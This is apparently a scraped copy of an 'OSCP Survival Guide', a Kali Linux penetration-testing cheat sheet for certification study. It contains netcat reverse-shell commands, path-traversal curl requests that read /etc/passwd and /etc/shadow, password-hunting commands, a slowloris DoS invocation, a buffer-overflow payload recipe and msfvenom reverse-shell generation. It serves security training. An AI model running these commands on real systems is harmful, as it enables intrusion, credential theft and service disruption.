0% found this document useful (0 votes)

18 views101 pages

OSCP Survival Guide

Uploaded by

kumarshaurya0711

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

18 views101 pages

OSCP Survival Guide

Uploaded by

kumarshaurya0711

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 101

OSCP-Survival-Guide

A GUEST NOV 22ND, 2017 8,387 NEVER

Not a member of Pastebin yet? Sign Up, it unlocks many cool features!

text 98.82 KB raw download report

1. # OSCP-Survival-Guide

2. <pre>
3. _____ _____ _____ ______ _____ _ _ _____ _ _

4. | _ / _/ \| _ \ / _| (_) | | | __ \ (_) | |

5. | | | \ `--.| / \/| |_/ / \ `--. _ _ _ ____ _____ ____ _| | | | \/_ _ _ __| | ___

6. | | | |`--. \ | | / `--. \ | | | '\ \ / / \ \ / / _` | | | | __| | | | |/ _` |/ _ \

7. \ \_/ /\__/ / \__/\| | /\__/ / |_| | | \ V /| |\ V / (_| | | | |_\ \ |_| | | (_| | __/
8. \___/\____/ \____/\_| \____/ \__,_|_| \_/ |_| \_/ \__,_|_| \____/\__,_|_|\__,_|\___|

9. </pre>
10. Kali Linux Offensive Security Certified Professional Playbook

11.

12. **NOTE: This document reffers to the target ip as the export variable $ip.**
13.

14. **To set this value on the command line use the following syntax:**
15.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
16. **export ip=192.168.1.100**
17.

18.

19. UPDATE: October 2, 2017

20. Thanks for all the Stars! Wrote my OSCP exam last night, did not pass sadly ... but I recorded a stop motion video of my failed

attempt. TRY HARDER!

21.

22. https://www.youtube.com/watch?v=HBMZWl9zcsc

23.

24. The good news is that I will be learning more and adding more content to this guide :D

25.
26.

27. ## Table of Contents

28. - [Kali Linux](#kali-linux)

29. - [Information Gathering & Vulnerability Scanning](#information-gathering--vulnerability-scanning)

30. * [Passive Information Gathering](#passive-information-gathering)

31. * [Active Information Gathering](#active-information-gathering)

32. * [Port Scanning](#port-scanning)

33. * [Enumeration](#enumeration)

34. * [HTTP Enumeration](#http-enumeration)

35. - [Buffer Overflows and Exploits](#buffer-overflows-and-exploits)

36. - [Shells](#shells)

37. - [File Transfers](#file-transfers)

38. - [Privilege Escalation](#privilege-escalation)

39. * [Linux Privilege Escalation](#linux-privilege-escalation)

40. * [Windows Privilege Escalation](#windows-privilege-escalation)

41. - [Client, Web and Password Attacks](#client-web-and-password-attacks)

42. * [Client Attacks](#client-attacks)

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
43. * [Web Attacks](#web-attacks)
44. * [File Inclusion Vulnerabilities LFI/RFI](#file-inclusion-vulnerabilities)

45. * [Database Vulnerabilities](#database-vulnerabilities)

46. * [Password Attacks](#password-attacks)
47. * [Password Hash Attacks](#password-hash-attacks)

48. - [Networking, Pivoting and Tunneling](#networking-pivoting-and-tunneling)

49. - [The Metasploit Framework](#the-metasploit-framework)

50. - [Bypassing Antivirus Software](#bypassing-antivirus-software)

51.
52. Kali Linux

53. ========================================================================================================
54.

55. - Set the Target IP Address to the `$ip` system variable

56. `export ip=192.168.1.100`
57.

58. - Find the location of a file

59. `locate sbd.exe`
60.

61. - Search through directories in the `$PATH` environment variable

62. `which sbd`

63.
64. - Find a search for a file that contains a specific string in it’s
65. name:

66. `find / -name sbd\*`

67.

68. - Show active internet connections

69. `netstat -lntp`
70.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
71. - Change Password

72. `passwd`
73.
74. - Verify a service is running and listening

75. `netstat -antp |grep apache`

76.

77. - Start a service

78. `systemctl start ssh `
79.

80. `systemctl start apache2`

81.

82. - Have a service start at boot

83. `systemctl enable ssh`
84.

85. - Stop a service

86. `systemctl stop ssh`

87.
88. - Unzip a gz file
89. `gunzip access.log.gz`

90.
91. - Unzip a tar.gz file

92. `tar -xzvf file.tar.gz`

93.
94. - Search command history

95. `history | grep phrase_to_search_for`

96.
97. - Download a webpage

98. `wget http://www.cisco.com`

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
99.

100. - Open a webpage

101. `curl http://www.cisco.com`

102.

103. - String manipulation

104.

105. - Count number of lines in file

106. `wc index.html`

107.

108. - Get the start or end of a file

109. `head index.html`

110.
111. `tail index.html`

112.

113. - Extract all the lines that contain a string

114. `grep "href=" index.html`

115.

116. - Cut a string by a delimiter, filter results then sort

117. `grep "href=" index.html | cut -d "/" -f 3 | grep "\\." | cut -d '"' -f 1 | sort -u`

118.

119. - Using Grep and regular expressions and output to a file

120. `cat index.html | grep -o 'http://\[^"\]\*' | cut -d "/" -f 3 | sort –u > list.txt`

121.

122. - Use a bash loop to find the IP address behind each host

123. `for url in $(cat list.txt); do host $url; done`

124.

125. - Collect all the IP Addresses from a log file and sort by

126. frequency

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
127. `cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn`

128.
129. - Decoding using Kali

130.

131. - Decode Base64 Encoded Values

132.
133. `echo -n "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" | base64 --decode`

134.

135. - Decode Hexidecimal Encoded Values

136. `echo -n "46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874" | xxd -r -ps`

137.

138. - Netcat - Read and write TCP and UDP Packets

139.

140. - Download Netcat for Windows (handy for creating reverse shells and transfering files on windows systems):

141. [https://joncraton.org/blog/46/netcat-for-windows/](https://joncraton.org/blog/46/netcat-for-windows/)

142.
143. - Connect to a POP3 mail server

144. `nc -nv $ip 110`

145.
146. - Listen on TCP/UDP port

147. `nc -nlvp 4444`

148.
149. - Connect to a netcat port

150. `nc -nv $ip 4444`

151.

152. - Send a file using netcat

153. `nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe`

154.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
155. - Receive a file using netcat

156. `nc -nlvp 4444 > incoming.exe`

157.
158. - Some OSs (OpenBSD) will use nc.traditional rather than nc so watch out for that...

159.

160. whereis nc
161. nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz

162.

163. /bin/nc.traditional -e /bin/bash 1.2.3.4 4444

164.
165.

166. - Create a reverse shell with Ncat using cmd.exe on Windows

167. `nc.exe -nlvp 4444 -e cmd.exe`

168.

169. or

170.
171. `nc.exe -nv <Remote IP> <Remote Port> -e cmd.exe`

172.

173. - Create a reverse shell with Ncat using bash on Linux

174. `nc -nv $ip 4444 -e /bin/bash`

175.

176. - Netcat for Banner Grabbing:

177.
178. `echo "" | nc -nv -w1 <IP Address> <Ports>`

179.

180. - Ncat - Netcat for Nmap project which provides more security avoid
181. IDS

182.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
183. - Reverse shell from windows using cmd.exe using ssl
184. `ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl`

185.

186. - Listen on port 4444 using ssl

187. `ncat -v $ip 4444 --ssl`

188.

189. - Wireshark
190. - Show only SMTP (port 25) and ICMP traffic:

191.

192. `tcp.port eq 25 or icmp`

193.

194. - Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet:

195.

196. `ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16`

197.

198. - Filter by a protocol ( e.g. SIP ) and filter out unwanted IPs:

199.
200. `ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip`

201.

202. - Some commands are equal

203.

204. `ip.addr == xxx.xxx.xxx.xxx`

205.

206. Equals
207.

208. `ip.src == xxx.xxx.xxx.xxx or ip.dst == xxx.xxx.xxx.xxx `

209.
210. ` ip.addr != xxx.xxx.xxx.xxx`

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
211.

212. Equals
213.
214. `ip.src != xxx.xxx.xxx.xxx or ip.dst != xxx.xxx.xxx.xxx`

215.
216. - Tcpdump
217.

218. - Display a pcap file

219. `tcpdump -r passwordz.pcap`

220.
221. - Display ips and filter and sort
222. `tcpdump -n -r passwordz.pcap | awk -F" " '{print $3}' | sort -u | head`

223.
224. - Grab a packet capture on port 80
225. `tcpdump tcp port 80 -w output.pcap -i eth0`

226.
227. - Check for ACK or PSH flag set in a TCP packet
228. `tcpdump -A -n 'tcp[13] = 24' -r passwordz.pcap`

229.
230. - IPTables
231.

232. - Deny traffic to ports except for Local Loopback

233.
234. `iptables -A INPUT -p tcp --destination-port 13327 ! -d $ip -j DROP `

235.
236. `iptables -A INPUT -p tcp --destination-port 9991 ! -d $ip -j DROP`
237.

238. - Clear ALL IPTables firewall rules

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
239.

240. iptables -P INPUT ACCEPT

241. iptables -P FORWARD ACCEPT

242. iptables -P OUTPUT ACCEPT

243. iptables -t nat -F
244. iptables -t mangle -F

245. iptables -F
246. iptables -X
247. iptables -t raw -F iptables -t raw -X

248.
249. Information Gathering & Vulnerability Scanning
250. ===================================================================================================================================

251.
252. - Passive Information Gathering
253. ---------------------------------------------------------------------------------------------------------------------------

254.
255. - Google Hacking
256.

257. - Google search to find website sub domains

258. `site:microsoft.com`
259.

260. - Google filetype, and intitle

261. `intitle:"netbotz appliance" "OK" -filetype:pdf`

262.
263. - Google inurl
264. `inurl:"level/15/sexec/-/show"`

265.
266. - Google Hacking Database:

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
267. https://www.exploit-db.com/google-hacking-database/
268.
269. - SSL Certificate Testing

270. [https://www.ssllabs.com/ssltest/analyze.html](https://www.ssllabs.com/ssltest/analyze.html)
271.
272. - Email Harvesting

273.
274. - Simply Email
275. `git clone https://github.com/killswitch-GUI/SimplyEmail.git `

276.
277. `./SimplyEmail.py -all -e TARGET-DOMAIN`
278.

279. - Netcraft
280.
281. - Determine the operating system and tools used to build a site

282. https://searchdns.netcraft.com/
283.

284. - Whois Enumeration

285. `whois domain-name-here.com `
286.

287. `whois $ip`

288.
289. - Banner Grabbing

290.
291. - `nc -v $ip 25`
292.

293. - `telnet $ip 25`

294.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
295. - `nc TARGET-IP 80`
296.
297. - Recon-ng - full-featured web reconnaissance framework written in Python

298.
299. - `cd /opt; git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git `
300.

301. `cd /opt/recon-ng `

302.

303. `./recon-ng `
304.
305. `show modules `

306.
307. `help`
308.

309. - Active Information Gathering

310. --------------------------------------------------------------------------------------------------------------------------
311.

312.

313.
314.

315. - Port Scanning

316. -----------------------------------------------------------------------------------------------------------
317. *Subnet Reference Table*

318.
319. / | Addresses | Hosts | Netmask | Amount of a Class C
320. --- | --- | --- | --- | ---

321. /30 | 4 | 2 | 255.255.255.252| 1/64

322. /29 | 8 | 6 | 255.255.255.248 | 1/32

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
323. /28 | 16 | 14 | 255.255.255.240 | 1/16
324. /27 | 32 | 30 | 255.255.255.224 | 1/8

325. /26 | 64 | 62 | 255.255.255.192 | 1/4

326. /25 | 128 | 126 | 255.255.255.128 | 1/2
327. /24 | 256 | 254 | 255.255.255.0 | 1

328. /23 | 512 | 510 | 255.255.254.0 | 2

329. /22 | 1024 | 1022 | 255.255.252.0 | 4
330. /21 | 2048 | 2046 | 255.255.248.0 | 8

331. /20 | 4096 | 4094 | 255.255.240.0 | 16

332. /19 | 8192 | 8190 | 255.255.224.0 | 32
333. /18 | 16384 | 16382 | 255.255.192.0 | 64

334. /17 | 32768 | 32766 | 255.255.128.0 | 128

335. /16 | 65536 | 65534 | 255.255.0.0 | 256
336.

337. - Set the ip address as a varble

338. `export ip=192.168.1.100 `
339. `nmap -A -T4 -p- $ip`

340.
341. - Netcat port Scanning
342. `nc -nvv -w 1 -z $ip 3388-3390`

343.
344. - Discover active IPs usign ARP on the network:
345. `arp-scan $ip/24`

346.
347. - Discover who else is on the network

348. `netdiscover`
349.
350. - Discover IP Mac and Mac vendors from ARP

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
351. `netdiscover -r $ip/24`
352.

353. - Nmap stealth scan using SYN

354. `nmap -sS $ip`
355.

356. - Nmap stealth scan using FIN

357. `nmap -sF $ip`
358.

359. - Nmap Banner Grabbing

360. `nmap -sV -sT $ip`
361.

362. - Nmap OS Fingerprinting

363. `nmap -O $ip`
364.

365. - Nmap Regular Scan:

366. `nmap $ip/24`

367.
368. - Enumeration Scan
369. `nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt`

370.
371. - Enumeration Scan All Ports TCP / UDP and output to a txt file
372. `nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip`

373.
374. - Nmap output to a file:
375. `nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24`

376.
377. - Quick Scan:
378. `nmap -T4 -F $ip/24`

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
379.
380. - Quick Scan Plus:

381. `nmap -sV -T4 -O -F --version-light $ip/24`

382.
383. - Quick traceroute

384. `nmap -sn --traceroute $ip`

385.
386. - All TCP and UDP Ports

387. `nmap -v -sU -sS -p- -A -T4 $ip`

388.

389. - Intense Scan:

390. `nmap -T4 -A -v $ip`
391.

392. - Intense Scan Plus UDP

393. `nmap -sS -sU -T4 -A -v $ip/24`
394.

395. - Intense Scan ALL TCP Ports

396. `nmap -p 1-65535 -T4 -A -v $ip/24`
397.

398. - Intense Scan - No Ping

399. `nmap -T4 -A -v -Pn $ip/24`
400.

401. - Ping scan

402. `nmap -sn $ip/24`
403.

404. - Slow Comprehensive Scan

405. `nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24`
406.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
407. - Scan with Active connect in order to weed out any spoofed ports designed to troll you

408. `nmap -p1-65535 -A -T5 -sT $ip`

409.
410. - Enumeration

411. -----------
412.
413. - DNS Enumeration

414.
415. - NMAP DNS Hostnames Lookup
416. `nmap -F --dns-server <dns server ip> <target ip range>`

417.
418. - Host Lookup
419. `host -t ns megacorpone.com`

420.
421. - Reverse Lookup Brute Force - find domains in the same range
422. `for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"`

423.
424. - Perform DNS IP Lookup
425. `dig a domain-name-here.com @nameserver`

426.
427. - Perform MX Record Lookup
428. `dig mx domain-name-here.com @nameserver`

429.
430. - Perform Zone Transfer with DIG

431. `dig axfr domain-name-here.com @nameserver`

432.
433. - DNS Zone Transfers

434. Windows DNS zone transfer

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
435.
436. `nslookup -> set type=any -> ls -d blah.com `
437.

438. Linux DNS zone transfer

439.
440. `dig axfr blah.com @ns1.blah.com`
441.
442. - Dnsrecon DNS Brute Force

443. `dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml`

444.
445. - Dnsrecon DNS List of megacorp
446. `dnsrecon -d megacorpone.com -t axfr`
447.
448. - DNSEnum

449. `dnsenum zonetransfer.me`

450.
451. - NMap Enumeration Script List:
452.
453. - NMap Discovery
454. [*https://nmap.org/nsedoc/categories/discovery.html*](https://nmap.org/nsedoc/categories/discovery.html)

455.
456. - Nmap port version detection MAXIMUM power
457. `nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p <port> <host>`
458.
459.
460. - NFS (Network File System) Enumeration

461.
462. - Show Mountable NFS Shares

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
463. `nmap -sV --script=nfs-showmount $ip`
464.

465. - RPC (Remote Procedure Call) Enumeration

466.
467. - Connect to an RPC share without a username and password and enumerate privledges
468. `rpcclient --user="" --command=enumprivs -N $ip`
469.
470. - Connect to an RPC share with a username and enumerate privledges

471. `rpcclient --user="<Username>" --command=enumprivs $ip`

472.
473.
474. - SMB Enumeration
475.
476. - SMB OS Discovery

477. `nmap $ip --script smb-os-discovery.nse`

478.
479. - Nmap port scan
480. `nmap -v -p 139,445 -oG smb.txt $ip-254`
481.

482. - Netbios Information Scanning

483. `nbtscan -r $ip/24`
484.
485. - Nmap find exposed Netbios servers
486. `nmap -sU --script nbstat.nse -p 137 $ip`
487.

488. - Nmap all SMB scripts scan

489.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
490. `nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1
$ip`

491.
492. - Nmap all SMB scripts authenticated scan
493.
494. `nmap -sV -Pn -vv -p 445 --script-args smbuser=<username>,smbpass=<password> --script='(smb*) and not (brute or broadcast or
dos or external or fuzzer)' --script-args=unsafe=1 $ip`
495.

496. - SMB Enumeration Tools

497. `nmblookup -A $ip `
498.
499. `smbclient //MOUNT/share -I $ip -N `
500.

501. `rpcclient -U "" $ip `

502.
503. `enum4linux $ip `
504.
505. `enum4linux -a $ip`
506.

507.
508. - SMB Finger Printing
509. `smbclient -L //$ip`
510.
511. - Nmap Scan for Open SMB Shares
512. `nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.10.0/24`

513.
514. - Nmap scans for vulnerable SMB Servers
515. `nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip`

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
516.
517. - Nmap List all SMB scripts installed

518. `ls -l /usr/share/nmap/scripts/smb*`

519.
520. - Enumerate SMB Users
521.
522. `nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14`

523.
524. OR
525.
526. `python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip`
527.
528.

529. - RID Cycling - Null Sessions

530. `ridenum.py $ip 500 50000 dict.txt`
531.
532. - Manual Null Session Testing
533.
534. Windows: `net use \\$ip\IPC$ "" /u:""`

535.
536. Linux: `smbclient -L //$ip`
537.
538.
539. - SMTP Enumeration - Mail Severs
540.

541. - Verify SMTP port using Netcat

542. `nc -nv $ip 25`
543.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
544. - POP3 Enumeration - Reading other peoples mail - You may find usernames and passwords for email accounts, so here is how to check

the mail using Telnet

545.
546. root@kali:~# telnet $ip 110
547. +OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
548. USER billydean
549. +OK

550. PASS password

551. +OK Welcome billydean
552.
553. list
554.
555. +OK 2 1807

556. 1 786
557. 2 1021
558.
559. retr 1
560.

561. +OK Message follows

562. From: jamesbrown@motown.com
563. Dear Billy Dean,
564.
565. Here is your login for remote desktop ... try not to forget it this time!
566. username: billydean

567. password: PA$$W0RD!Z

568.
569.
570. - SNMP Enumeration -Simple Network Management Protocol

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
571.

572. - Fix SNMP output values so they are human readable

573. `apt-get install snmp-mibs-downloader download-mibs `
574. `echo "" > /etc/snmp/snmp.conf`
575.
576. - SNMP Enumeration Commands
577.

578. - `snmpcheck -t $ip -c public`

579.
580. - `snmpwalk -c public -v1 $ip 1|`
581.
582. - `grep hrSWRunName|cut -d\* \* -f`

583.
584. - `snmpenum -t $ip`
585.
586. - `onesixtyone -c names -i hosts`
587.
588. - SNMPv3 Enumeration

589. `nmap -sV -p 161 --script=snmp-info $ip/24`

590.
591. - Automate the username enumeration process for SNMPv3:
592. `apt-get install snmp snmp-mibs-downloader `
593. `wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb`
594.

595. - SNMP Default Credentials

596. /usr/share/metasploit-framework/data/wordlists/snmp\_default\_pass.txt
597.
598.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
599. - MS SQL Server Enumeration

600.
601. - Nmap Information Gathering
602.
603. `nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-
sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-

port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip`
604.
605. - Webmin and miniserv/0.01 Enumeration - Port 10000
606.
607. Test for LFI & file disclosure vulnerability by grabbing /etc/passwd
608.

609. `curl
http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01
610.
611. Test to see if webmin is running as root by grabbing /etc/shadow
612.
613. `curl

http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01
614.
615. - Linux OS Enumeration
616.
617. - List all SUID files
618. `find / -perm -4000 2>/dev/null`

619.
620. - Determine the current version of Linux
621. `cat /etc/issue`
622.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
623. - Determine more information about the environment
624. `uname -a`
625.
626. - List processes running
627. `ps -xaf`
628.

629. - List the allowed (and forbidden) commands for the invoking use
630. `sudo -l`
631.
632. - List iptables rules
633. `iptables --table nat --list
634. iptables -vL -t filter

635. iptables -vL -t nat

636. iptables -vL -t mangle
637. iptables -vL -t raw
638. iptables -vL -t security`
639.

640. - Windows OS Enumeration

641.
642.
643. - net config Workstation
644.
645. - systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

646.
647. - hostname
648.
649. - net users
650.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
651. - ipconfig /all
652.
653. - route print
654.
655. - arp -A
656.

657. - netstat -ano

658.
659. - netsh firewall show state
660.
661. - netsh firewall show config

662.
663. - schtasks /query /fo LIST /v
664.
665. - tasklist /SVC
666.
667. - net start

668.
669. - DRIVERQUERY
670.
671. - reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
672.
673. - reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

674.
675. - dir /s *pass* == *cred* == *vnc* == *.config*
676.
677. - findstr /si password *.xml *.ini *.txt
678.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
679. - reg query HKLM /f password /t REG_SZ /s
680.
681. - reg query HKCU /f password /t REG_SZ /s
682.
683. - Vulnerability Scanning with Nmap

684.
685. - Nmap Exploit Scripts
686. [*https://nmap.org/nsedoc/categories/exploit.html*](https://nmap.org/nsedoc/categories/exploit.html)
687.
688. - Nmap search through vulnerability scripts
689. `cd /usr/share/nmap/scripts/

690. ls -l \*vuln\*`
691.
692. - Nmap search through Nmap Scripts for a specific keyword
693. `ls /usr/share/nmap/scripts/\* | grep ftp`
694.
695. - Scan for vulnerable exploits with nmap

696. `nmap --script exploit -Pn $ip`

697.
698. - NMap Auth Scripts
699. [*https://nmap.org/nsedoc/categories/auth.html*](https://nmap.org/nsedoc/categories/auth.html)
700.
701. - Nmap Vuln Scanning

702. [*https://nmap.org/nsedoc/categories/vuln.html*](https://nmap.org/nsedoc/categories/vuln.html)
703.
704. - NMap DOS Scanning
705. `nmap --script dos -Pn $ip
706. NMap Execute DOS Attack

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
707. nmap --max-parallelism 750 -Pn --script http-slowloris --script-args
708. http-slowloris.runforever=true`
709.
710. - Scan for coldfusion web vulnerabilities
711. `nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip`

712.
713. - Anonymous FTP dump with Nmap
714. `nmap -v -p 21 --script=ftp-anon.nse $ip-254`
715.
716. - SMB Security mode scan with Nmap
717. `nmap -v -p 21 --script=ftp-anon.nse $ip-254`

718.
719. - File Enumeration
720.
721. - Find UID 0 files root execution
722.
723. - `/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null`

724.
725. - Get handy linux file system enumeration script (/var/tmp)
726. `wget https://highon.coffee/downloads/linux-local-enum.sh `
727. `chmod +x ./linux-local-enum.sh `
728. `./linux-local-enum.sh`

729.
730. - Find executable files updated in August
731. `find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug`
732.
733. - Find a specific file on linux
734. `find /. -name suid\*`

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
735.
736. - Find all the strings in a file
737. `strings <filename>`
738.
739. - Determine the type of a file

740. `file <filename>`

741.
742. - HTTP Enumeration
743. ----------------
744.

745. - Search for folders with gobuster:

746. `gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip`
747.
748. - OWasp DirBuster - Http folder enumeration - can take a dictionary file
749.
750. - Dirb - Directory brute force finding using a dictionary file

751. `dirb http://$ip/ wordlist.dict `

752. `dirb <http://vm/> `
753.
754. Dirb against a proxy
755.
756. - `dirb [http://$ip/](http://172.16.0.19/) -p $ip:3129`

757.
758. - Nikto
759. `nikto -h $ip`
760.
761. - HTTP Enumeration with NMAP
762. `nmap --script=http-enum -p80 -n $ip/24`

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
763.
764. - Nmap Check the server methods
765. `nmap --script http-methods --script-args http-methods.url-path='/test' $ip`
766.

767. - Get Options available from web server

768. `curl -vX OPTIONS vm/test`
769.
770. - Uniscan directory finder:
771. `uniscan -qweds -u <http://vm/>`
772.

773. - Wfuzz - The web brute forcer

774.
775. `wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test `
776.
777. `wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ `
778.

779. `wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"`

780.
781. `wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ`
782.
783. Recurse level 3
784.

785. `wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ`

786.
787. 
788.
789. - Open a service using a port knock (Secured with Knockd)

790. for x in 7000 8000 9000; do nmap -Pn --host\_timeout 201

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
791. --max-retries 0 -p $x server\_ip\_address; done
792.
793. - WordPress Scan - Wordpress security scanner
794.

795. - wpscan --url $ip/blog --proxy $ip:3129

796.
797. - RSH Enumeration - Unencrypted file transfer system
798.
799. - auxiliary/scanner/rservices/rsh\_login
800.

801. - Finger Enumeration

802.
803. - finger @$ip
804.
805. - finger batman@$ip
806.

807. - TLS & SSL Testing

808.
809. - ./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha >
810. OUTPUT-FILE.html
811.

812. - Proxy Enumeration (useful for open proxies)

813.
814. - nikto -useproxy http://$ip:3128 -h $ip
815.
816. - Steganography
817.

818. > apt-get install steghide

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
819. >
820. > steghide extract -sf picture.jpg
821. >
822. > steghide info picture.jpg

823. >
824. > apt-get install stegosuite
825.
826. - The OpenVAS Vulnerability Scanner
827.

828. - apt-get update

829. apt-get install openvas
830. openvas-setup
831.
832. - netstat -tulpn
833.

834. - Login at:

835. https://$ip:9392
836.
837. Buffer Overflows and Exploits
838. ===================================================================================================================================
839.

840. - DEP and ASLR - Data Execution Prevention (DEP) and Address Space
841. Layout Randomization (ASLR)
842.
843.
844. - Nmap Fuzzers:
845.

846. - NMap Fuzzer List

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
847. [https://nmap.org/nsedoc/categories/fuzzer.html](https://nmap.org/nsedoc/categories/fuzzer.html)
848.
849. - NMap HTTP Form Fuzzer

850. nmap --script http-form-fuzzer --script-args

851. 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}'
852. -p 80 $ip
853.
854. - Nmap DNS Fuzzer
855. nmap --script dns-fuzz --script-args timelimit=2h $ip -d

856.
857. - MSFvenom
858. [*https://www.offensive-security.com/metasploit-unleashed/msfvenom/*](https://www.offensive-security.com/metasploit-
unleashed/msfvenom/)
859.
860. - Windows Buffer Overflows

861.
862. - Controlling EIP
863.
864. locate pattern_create
865. pattern_create.rb -l 2700
866. locate pattern_offset

867. pattern_offset.rb -q 39694438

868.
869. - Verify exact location of EIP - [\*] Exact match at offset 2606
870.
871. buffer = "A" \* 2606 + "B" \* 4 + "C" \* 90

872.
873. - Check for “Bad Characters” - Run multiple times 0x00 - 0xFF

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
874.
875. - Use Mona to determine a module that is unprotected

876.
877. - Bypass DEP if present by finding a Memory Location with Read and Execute access for JMP ESP

878.
879. - Use NASM to determine the HEX code for a JMP ESP instruction

880.

881. /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
882.

883. JMP ESP

884. 00000000 FFE4 jmp esp

885.

886. - Run Mona in immunity log window to find (FFE4) XEF command
887.

888. !mona find -s "\xff\xe4" -m slmfc.dll

889. found at 0x5f4a358f - Flip around for little endian format

890. buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390

891.
892. - MSFVenom to create payload

893.
894. msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"

895.
896. - Final Payload with NOP slide

897.

898. buffer="A"2606 + "\x8f\x35\x4a\x5f" + "\x90" 8 + shellcode

899.

900. - Create a PE Reverse Shell

901. msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
902. -f

903. exe -o shell\_reverse.exe

904.

